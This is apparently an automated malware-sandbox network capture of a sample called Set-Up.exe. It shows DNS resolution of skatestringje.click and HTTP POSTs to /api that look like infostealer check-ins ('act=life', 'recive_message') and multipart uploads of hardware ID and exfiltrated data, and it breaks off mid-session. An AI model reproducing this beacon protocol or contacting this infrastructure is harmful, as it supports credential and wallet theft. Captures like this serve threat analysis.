                                                                            Jan 15, 2025 16:00:34.435527086 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.435551882 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:34.435587883 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.435645103 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:34.440437078 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:36.068288088 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:36.068533897 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:36.068619013 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:36.068741083 CET49742443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:36.068767071 CET44349742104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:36.101927042 CET49743443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:36.101977110 CET44349743104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:36.102065086 CET49743443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:36.102350950 CET49743443192.168.2.4104.21.75.15
                                                                            Jan 15, 2025 16:00:36.102366924 CET44349743104.21.75.15192.168.2.4
                                                                            Jan 15, 2025 16:00:36.208851099 CET49743443192.168.2.4104.21.75.15
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Jan 15, 2025 16:00:24.292221069 CET6324253192.168.2.41.1.1.1
                                                                            Jan 15, 2025 16:00:24.307174921 CET53632421.1.1.1192.168.2.4
                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Jan 15, 2025 16:00:24.292221069 CET192.168.2.41.1.1.10x8453Standard query (0)skatestringje.clickA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Jan 15, 2025 16:00:24.307174921 CET1.1.1.1192.168.2.40x8453No error (0)skatestringje.click104.21.75.15A (IP address)IN (0x0001)false
                                                                            Jan 15, 2025 16:00:24.307174921 CET1.1.1.1192.168.2.40x8453No error (0)skatestringje.click172.67.166.121A (IP address)IN (0x0001)false
                                                                            • skatestringje.click
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449730104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:24 UTC266OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8
                                                                            Host: skatestringje.click
                                                                            2025-01-15 15:00:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                            Data Ascii: act=life
                                                                            2025-01-15 15:00:25 UTC1130INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:25 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=8a3mdpccpavtjq0uvhof3hth12; expires=Sun, 11 May 2025 08:47:04 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AXd3stbLP6WQyIbduzdlXT%2BBC3XNL36RJBXq1RwsZQQFWtfQY6mlLzUU6iFTq9RTSJvgK1L8%2B00PhEnvdPi3%2BofxeEsEuh8IWIJX9Gg7RDLcL9IAsQJXoZLQaF%2F8K3u1sj%2BgdCi6"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc389f3b42f7-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8589&min_rtt=1637&rtt_var=4890&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=910&delivery_rate=1783750&cwnd=179&unsent_bytes=0&cid=77ae011488b44deb&ts=580&x=0"
                                                                            2025-01-15 15:00:25 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                            Data Ascii: 2ok
                                                                            2025-01-15 15:00:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449731104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:25 UTC267OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 52
                                                                            Host: skatestringje.click
                                                                            2025-01-15 15:00:25 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 4c 65 64 67 65 72 6c 69 76 65 26 6a 3d
                                                                            Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--Ledgerlive&j=
                                                                            2025-01-15 15:00:26 UTC1130INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:26 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=6hlenq8r5e9gtjfdnol5k2h4cu; expires=Sun, 11 May 2025 08:47:05 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kf%2BeObogguoDPFeEz%2FxihebEXCSMhhKmGd521hDNtKvz4IVxoAZD8NmM%2FMDDTd4bOO5QJbR0%2F1%2BqwcSOyfV5bIpzj016Zy5Gi8MexQr3NXc7NoTb3nBxbweOd46nXHUfkT1vhWZK"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc3edcfdac42-YYZ
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=14586&min_rtt=14428&rtt_var=5523&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=955&delivery_rate=202384&cwnd=32&unsent_bytes=0&cid=d12df45f23645032&ts=514&x=0"
                                                                            2025-01-15 15:00:26 UTC239INData Raw: 34 39 39 34 0d 0a 5a 61 56 56 52 44 47 7a 7a 6e 37 4c 6a 71 68 50 34 75 47 4d 78 7a 7a 33 50 62 73 36 4b 74 50 73 39 32 33 4d 73 37 2b 4b 57 30 55 65 68 79 4e 6d 43 34 66 69 58 4c 6a 72 69 6e 57 57 6b 2f 6d 69 45 4e 56 63 33 78 67 51 74 59 32 62 48 71 6d 66 6e 66 77 32 5a 31 2f 44 4e 43 68 43 31 75 4a 63 72 76 61 4b 64 62 6d 61 72 71 4a 53 31 51 65 5a 58 30 43 78 6a 5a 73 50 72 64 6a 51 2b 6a 63 6d 44 63 6b 79 4c 46 54 51 71 68 2b 6e 34 38 30 71 68 34 44 6d 71 56 57 61 56 64 59 59 42 76 47 4a 6a 55 2f 32 6b 66 4c 76 4c 79 51 6f 78 43 59 76 45 38 37 69 42 65 6e 72 78 6d 33 59 77 2b 32 69 58 70 74 62 33 31 46 43 75 34 53 54 44 71 6a 5a 7a 2b 4d 39 4c 51 33 48 4d 53 31 65 32 62 34 53 72 65 54 47 4c 49 32 41 72
                                                                            Data Ascii: 4994ZaVVRDGzzn7LjqhP4uGMxzz3Pbs6KtPs923Ms7+KW0UehyNmC4fiXLjrinWWk/miENVc3xgQtY2bHqmfnfw2Z1/DNChC1uJcrvaKdbmarqJS1QeZX0CxjZsPrdjQ+jcmDckyLFTQqh+n480qh4DmqVWaVdYYBvGJjU/2kfLvLyQoxCYvE87iBenrxm3Yw+2iXptb31FCu4STDqjZz+M9LQ3HMS1e2b4SreTGLI2Ar
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 75 73 65 6b 6b 65 5a 41 41 6a 69 76 4a 59 65 76 38 54 51 2b 44 39 6e 47 49 6b 75 5a 6c 54 64 37 45 54 70 35 4d 59 6a 68 59 44 68 6f 6c 2b 56 54 64 5a 59 53 37 6d 47 6b 51 57 68 33 74 4c 6d 4d 79 41 50 7a 6a 41 70 56 4e 6d 71 45 36 71 73 68 47 32 48 6d 36 37 39 48 72 56 50 32 6c 74 63 76 4a 2f 56 45 4f 44 49 6e 65 38 31 5a 31 2b 48 4d 53 68 53 33 4b 77 4f 6f 65 66 42 4b 4a 4b 49 35 36 68 54 6c 56 4c 54 56 30 75 78 69 5a 38 46 6f 64 76 5a 35 54 51 68 42 38 64 33 61 42 50 57 74 46 7a 78 72 4f 6b 6f 6b 49 54 69 73 78 79 76 48 38 59 57 55 66 47 4a 6d 55 2f 32 6b 64 58 74 4f 69 51 4d 79 44 51 75 57 4d 4f 73 44 71 2f 68 7a 7a 2b 47 68 75 43 76 58 59 64 56 31 31 35 4c 75 49 57 63 43 71 6e 56 6e 61 5a 35 49 42 2b 48 62 32 5a 79 33 4b 63 51 6f 2f 76 4b 62 5a 2f 4e
                                                                            Data Ascii: usekkeZAAjivJYev8TQ+D9nGIkuZlTd7ETp5MYjhYDhol+VTdZYS7mGkQWh3tLmMyAPzjApVNmqE6qshG2Hm679HrVP2ltcvJ/VEODIne81Z1+HMShS3KwOoefBKJKI56hTlVLTV0uxiZ8FodvZ5TQhB8d3aBPWtFzxrOkokITisxyvH8YWUfGJmU/2kdXtOiQMyDQuWMOsDq/hzz+GhuCvXYdV115LuIWcCqnVnaZ5IB+Hb2Zy3KcQo/vKbZ/N
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 64 54 30 31 35 48 76 49 4c 56 51 65 37 57 78 61 68 68 5a 79 33 45 49 79 56 5a 6b 35 6b 66 70 2b 4c 4e 4f 38 43 63 6f 4c 77 65 6b 6c 4f 5a 41 41 69 38 6a 35 30 4a 76 4e 37 51 36 7a 63 70 43 4d 49 34 4c 6c 50 52 6f 52 6d 74 35 38 45 75 6a 59 66 38 72 31 36 64 57 74 68 53 51 76 48 41 31 51 69 32 6b 59 57 6f 43 44 41 4d 68 51 49 6c 58 64 2b 72 43 75 6e 7a 68 44 54 41 68 4f 4c 6c 42 74 56 53 30 56 31 4e 76 6f 2b 66 41 61 76 62 30 65 41 33 4a 42 58 49 4d 79 5a 66 32 61 59 52 70 2b 6a 43 4a 49 75 49 36 4b 56 66 6e 78 2b 58 47 45 2b 70 7a 73 31 50 6d 74 62 52 35 54 5a 6c 4d 73 51 35 4b 46 54 48 37 41 50 6e 39 59 6f 71 6a 4d 4f 32 35 56 4b 63 58 39 4a 53 54 4c 47 4a 6d 41 71 74 31 74 37 6c 50 69 30 4a 77 44 4d 71 57 74 79 71 48 4b 37 6f 7a 7a 2b 46 69 75 4b 70 48
                                                                            Data Ascii: dT015HvILVQe7WxahhZy3EIyVZk5kfp+LNO8CcoLweklOZAAi8j50JvN7Q6zcpCMI4LlPRoRmt58EujYf8r16dWthSQvHA1Qi2kYWoCDAMhQIlXd+rCunzhDTAhOLlBtVS0V1Nvo+fAavb0eA3JBXIMyZf2aYRp+jCJIuI6KVfnx+XGE+pzs1PmtbR5TZlMsQ5KFTH7APn9YoqjMO25VKcX9JSTLGJmAqt1t7lPi0JwDMqWtyqHK7ozz+FiuKpH
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 59 56 2f 2b 58 31 51 69 69 6b 59 57 6f 4d 43 34 56 79 54 6b 76 58 74 65 6b 47 36 66 68 77 53 75 4c 68 4f 6d 6a 55 35 31 53 33 46 74 4a 74 59 53 48 44 4b 58 62 30 4f 4a 35 61 55 66 41 4c 32 59 4c 6b 59 73 51 67 50 7a 52 50 35 62 44 38 65 74 48 31 56 6a 56 47 42 44 78 6a 5a 6f 47 6f 64 6e 56 35 7a 59 6a 43 63 45 78 4b 31 62 65 70 67 36 68 34 73 63 6d 6a 34 6a 38 70 56 4f 52 55 39 31 51 51 37 76 4f 32 30 2b 70 79 5a 32 77 65 52 49 4b 79 44 63 6c 52 5a 47 7a 55 72 43 73 7a 53 48 41 32 36 36 70 55 4a 56 51 31 56 52 44 75 59 2b 5a 41 61 6e 55 31 4f 41 78 4e 51 62 44 50 79 64 64 33 71 30 59 72 4f 6e 4f 4b 6f 53 46 34 65 55 51 31 56 6a 42 47 42 44 78 6f 62 49 36 37 50 44 6e 71 43 5a 70 48 6f 63 77 4b 68 4f 4a 37 42 43 71 34 4d 49 69 68 6f 72 69 72 31 65 65 55 39
                                                                            Data Ascii: YV/+X1QiikYWoMC4VyTkvXtekG6fhwSuLhOmjU51S3FtJtYSHDKXb0OJ5aUfAL2YLkYsQgPzRP5bD8etH1VjVGBDxjZoGodnV5zYjCcExK1bepg6h4scmj4j8pVORU91QQ7vO20+pyZ2weRIKyDclRZGzUrCszSHA266pUJVQ1VRDuY+ZAanU1OAxNQbDPydd3q0YrOnOKoSF4eUQ1VjBGBDxobI67PDnqCZpHocwKhOJ7BCq4MIihorir1eeU9
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 69 70 41 41 72 39 44 62 2b 6a 34 75 46 63 6b 36 4b 56 76 5a 70 52 32 74 36 63 63 72 6a 49 6e 76 6f 6c 43 62 56 35 6b 57 43 4c 61 57 31 56 66 75 38 4d 33 7a 4b 7a 45 4b 35 6a 6f 70 45 38 37 69 42 65 6e 72 78 6d 33 59 77 2b 65 33 57 70 68 4e 30 46 39 47 76 6f 32 48 44 71 50 61 7a 2b 38 32 49 77 44 4c 4d 53 6c 56 30 4b 6b 57 70 65 76 50 4a 6f 2b 50 72 75 73 65 6b 6b 65 5a 41 41 69 66 68 59 59 59 72 64 2f 57 2f 69 4a 6e 47 49 6b 75 5a 6c 54 64 37 45 54 70 37 38 45 6d 68 49 50 69 70 56 71 59 58 38 74 58 54 37 61 48 6e 68 32 6b 31 74 72 6a 4d 53 77 49 77 53 55 71 58 63 4f 70 44 72 75 73 68 47 32 48 6d 36 37 39 48 71 4e 59 79 55 68 4c 38 37 2b 44 44 4c 6a 61 30 4f 52 35 4f 45 6e 65 64 79 46 66 6b 66 52 63 72 2b 50 44 4c 6f 2b 43 35 36 6c 54 6b 46 62 63 57 55 36
                                                                            Data Ascii: ipAAr9Db+j4uFck6KVvZpR2t6ccrjInvolCbV5kWCLaW1Vfu8M3zKzEK5jopE87iBenrxm3Yw+e3WphN0F9Gvo2HDqPaz+82IwDLMSlV0KkWpevPJo+PrusekkeZAAifhYYYrd/W/iJnGIkuZlTd7ETp78EmhIPipVqYX8tXT7aHnh2k1trjMSwIwSUqXcOpDrushG2Hm679HqNYyUhL87+DDLja0OR5OEnedyFfkfRcr+PDLo+C56lTkFbcWU6
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 61 33 4b 6e 66 64 33 50 6b 66 41 4f 32 59 4c 6b 61 38 62 71 75 33 41 4a 49 79 4d 36 61 46 4d 6e 31 6a 4c 57 55 6d 36 67 35 6b 50 6f 39 7a 58 36 54 41 71 43 38 6f 77 49 56 7a 55 37 46 4c 70 36 39 4a 74 32 4d 50 50 71 46 57 5a 42 49 4d 59 56 2f 2b 58 31 51 69 69 6b 59 57 6f 4f 53 30 43 7a 54 6f 6c 58 4e 4b 2b 48 61 2f 2b 79 69 43 4b 6b 65 53 75 57 35 68 53 31 46 74 4f 74 34 57 5a 48 61 66 52 33 75 4e 35 61 55 66 41 4c 32 59 4c 6b 59 38 4c 76 2b 62 4e 49 5a 61 49 37 36 5a 49 6d 45 2b 5a 46 67 69 67 69 59 52 50 39 73 66 4e 2f 7a 34 34 53 64 35 33 49 56 2b 52 39 46 79 76 35 63 77 71 68 6f 33 38 6f 46 69 61 55 4e 42 52 54 4c 6d 4e 6c 51 75 71 31 74 6a 72 4e 53 77 41 78 44 67 69 57 74 2b 6c 45 2b 6d 69 69 69 71 59 77 37 62 6c 66 34 35 63 31 56 55 49 72 73 43 4d
                                                                            Data Ascii: a3Knfd3PkfAO2YLka8bqu3AJIyM6aFMn1jLWUm6g5kPo9zX6TAqC8owIVzU7FLp69Jt2MPPqFWZBIMYV/+X1QiikYWoOS0CzTolXNK+Ha/+yiCKkeSuW5hS1FtOt4WZHafR3uN5aUfAL2YLkY8Lv+bNIZaI76ZImE+ZFgigiYRP9sfN/z44Sd53IV+R9Fyv5cwqho38oFiaUNBRTLmNlQuq1tjrNSwAxDgiWt+lE+miiiqYw7blf45c1VUIrsCM
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 33 76 49 57 64 66 68 78 63 74 52 64 53 72 43 75 76 5a 79 53 4f 4f 68 50 6a 6c 51 61 6f 52 6d 56 64 53 38 64 61 73 46 75 37 57 30 61 68 68 5a 78 4c 41 4e 79 46 4a 78 36 73 51 75 4f 66 48 49 61 4b 4d 36 62 4e 64 6d 6c 7a 49 55 51 53 36 67 39 56 42 37 74 62 46 71 47 46 6e 4b 4d 41 68 4a 58 7a 53 76 52 58 70 6f 6f 6f 71 6c 73 4f 32 35 57 44 56 54 64 70 49 53 37 36 66 71 30 2f 32 79 4f 4f 6f 4d 6a 45 41 31 7a 51 77 57 4e 79 67 44 5a 65 73 6b 6e 6e 53 30 62 7a 33 44 49 6f 66 78 6d 63 47 38 59 2f 56 56 35 66 49 6e 66 35 35 66 31 57 4a 64 7a 51 54 69 65 78 62 71 76 37 59 4b 34 4f 56 37 65 4a 67 71 33 6a 50 55 6b 2b 68 69 59 49 41 37 70 2b 64 35 33 6c 2f 50 6f 63 2b 49 55 6a 41 75 68 47 35 36 34 6f 53 7a 73 50 32 35 51 62 56 61 74 70 57 52 72 61 59 68 45 4b 4a 78
                                                                            Data Ascii: 3vIWdfhxctRdSrCuvZySOOhPjlQaoRmVdS8dasFu7W0ahhZxLANyFJx6sQuOfHIaKM6bNdmlzIUQS6g9VB7tbFqGFnKMAhJXzSvRXpoooqlsO25WDVTdpIS76fq0/2yOOoMjEA1zQwWNygDZesknnS0bz3DIofxmcG8Y/VV5fInf55f1WJdzQTiexbqv7YK4OV7eJgq3jPUk+hiYIA7p+d53l/Poc+IUjAuhG564oSzsP25QbVatpWRraYhEKJx
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 32 43 73 74 33 61 42 50 45 70 78 43 76 34 64 39 69 6b 5a 58 74 73 31 6e 5a 56 38 68 56 52 50 47 78 32 30 2b 32 6b 59 57 6f 44 43 51 4a 79 54 41 77 51 70 79 4d 46 36 58 76 78 69 79 48 77 36 44 6c 57 4e 55 48 69 68 59 49 74 5a 2f 56 56 2f 36 44 68 72 31 71 63 46 65 56 4b 47 68 4b 6b 62 70 63 38 62 36 45 62 5a 4c 44 74 75 55 5a 6c 6b 33 4c 58 6b 75 6e 6a 64 49 78 6b 4e 44 51 35 33 55 70 44 4d 63 77 4e 6b 58 4b 34 42 53 71 39 74 41 54 76 71 6a 69 6f 31 6d 50 57 4e 39 2b 61 50 48 41 31 51 44 75 69 65 53 6f 63 57 63 34 69 58 63 2b 45 34 6e 73 4b 61 72 69 78 43 71 57 6b 71 4f 4e 66 61 39 6c 6d 33 52 50 70 4d 79 68 43 4c 37 41 31 75 55 31 5a 30 6d 48 4d 57 59 4c 67 65 4a 63 72 66 32 4b 64 64 44 52 74 66 41 4e 77 67 2b 4c 52 77 61 6f 7a 6f 4e 50 39 6f 4f 54 71 43
                                                                            Data Ascii: 2Cst3aBPEpxCv4d9ikZXts1nZV8hVRPGx20+2kYWoDCQJyTAwQpyMF6XvxiyHw6DlWNUHihYItZ/VV/6Dhr1qcFeVKGhKkbpc8b6EbZLDtuUZlk3LXkunjdIxkNDQ53UpDMcwNkXK4BSq9tATvqjio1mPWN9+aPHA1QDuieSocWc4iXc+E4nsKarixCqWkqONfa9lm3RPpMyhCL7A1uU1Z0mHMWYLgeJcrf2KddDRtfANwg+LRwaozoNP9oOTqC
                                                                            2025-01-15 15:00:26 UTC1369INData Raw: 49 57 59 4c 67 75 4a 63 75 36 79 53 62 63 65 4e 34 36 52 64 6d 31 7a 4c 53 6b 36 79 6d 4a 5a 49 6b 4f 2f 34 35 54 51 69 43 63 41 4a 47 48 4c 62 76 42 47 6d 36 34 67 4e 68 35 58 74 6d 32 43 69 54 74 35 49 43 70 65 4e 67 77 7a 75 6e 35 33 77 65 58 39 48 35 6a 30 32 58 74 36 72 58 6f 6e 72 33 43 37 41 7a 61 36 68 48 73 30 66 2f 46 56 46 74 49 43 53 54 59 2f 62 7a 65 55 32 49 45 58 6e 4d 44 42 51 6b 65 4a 63 70 61 79 53 62 59 47 4a 2f 71 68 52 6b 68 50 65 51 6b 2f 78 77 4e 55 42 37 6f 6d 64 36 54 4d 33 43 73 67 77 61 6c 58 66 6f 6c 79 32 6f 74 4e 74 6c 73 4f 32 39 68 44 56 54 5a 6b 41 43 50 61 4e 68 78 32 6f 30 73 76 72 66 68 6b 35 36 69 55 68 51 39 4c 75 4c 61 54 6f 33 44 69 44 6b 2b 6d 62 59 4c 68 4e 33 6b 68 4c 38 37 2b 44 44 4b 37 66 32 71 68 33 5a 78 2b
                                                                            Data Ascii: IWYLguJcu6ySbceN46Rdm1zLSk6ymJZIkO/45TQiCcAJGHLbvBGm64gNh5Xtm2CiTt5ICpeNgwzun53weX9H5j02Xt6rXonr3C7Aza6hHs0f/FVFtICSTY/bzeU2IEXnMDBQkeJcpaySbYGJ/qhRkhPeQk/xwNUB7omd6TM3CsgwalXfoly2otNtlsO29hDVTZkACPaNhx2o0svrfhk56iUhQ9LuLaTo3DiDk+mbYLhN3khL87+DDK7f2qh3Zx+


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449732104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:27 UTC275OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=BWJ8AI49
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 18108
                                                                            Host: skatestringje.click
                                                                            2025-01-15 15:00:27 UTC15331OUTData Raw: 2d 2d 42 57 4a 38 41 49 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 32 43 30 34 46 37 41 42 32 44 45 35 45 32 42 36 37 39 33 31 45 37 38 39 37 46 31 35 44 46 45 0d 0a 2d 2d 42 57 4a 38 41 49 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 57 4a 38 41 49 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 4c 65 64 67 65 72 6c 69 76 65 0d 0a 2d 2d 42 57 4a 38 41 49 34 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                            Data Ascii: --BWJ8AI49Content-Disposition: form-data; name="hwid"92C04F7AB2DE5E2B67931E7897F15DFE--BWJ8AI49Content-Disposition: form-data; name="pid"2--BWJ8AI49Content-Disposition: form-data; name="lid"c2CoW0--Ledgerlive--BWJ8AI49Content-Dis
                                                                            2025-01-15 15:00:27 UTC2777OUTData Raw: cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d
                                                                            Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-
                                                                            2025-01-15 15:00:28 UTC1133INHTTP/1.1 200 OK
                                                                            Date: Wed, 15 Jan 2025 15:00:28 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Set-Cookie: PHPSESSID=83i9mpl5qtbelg0pdqjba7m8ln; expires=Sun, 11 May 2025 08:47:06 GMT; Max-Age=9999999; path=/
                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            X-Frame-Options: DENY
                                                                            X-Content-Type-Options: nosniff
                                                                            X-XSS-Protection: 1; mode=block
                                                                            cf-cache-status: DYNAMIC
                                                                            vary: accept-encoding
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onbPASE9RIxBlmwLJDtqkQ9grfSpcMnbp%2B0pwf%2FXhJKGAM7Wh3MlgbwTn0txhPhk6ZHSU7Ma21OgMtaZA5KgksxC71peWHWje9leE07p%2BcVuK6JeoG0UUvfdwM%2B3lfDC%2FAqzV65t"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 9026bc475d8da2bc-YUL
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=18234&min_rtt=17592&rtt_var=7055&sent=9&recv=22&lost=0&retrans=0&sent_bytes=2849&recv_bytes=19063&delivery_rate=165984&cwnd=32&unsent_bytes=0&cid=39f07c5ab7ef085c&ts=897&x=0"
                                                                            2025-01-15 15:00:28 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                            Data Ascii: fok 8.46.123.189
                                                                            2025-01-15 15:00:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449734104.21.75.154437352C:\Users\user\Desktop\Set-Up.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-15 15:00:28 UTC285OUTPOST /api HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Content-Type: multipart/form-data; boundary=ZSJ78F12SDQSP0HFFD5
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                            Content-Length: 8795
                                                                            Host: skatestringje.click
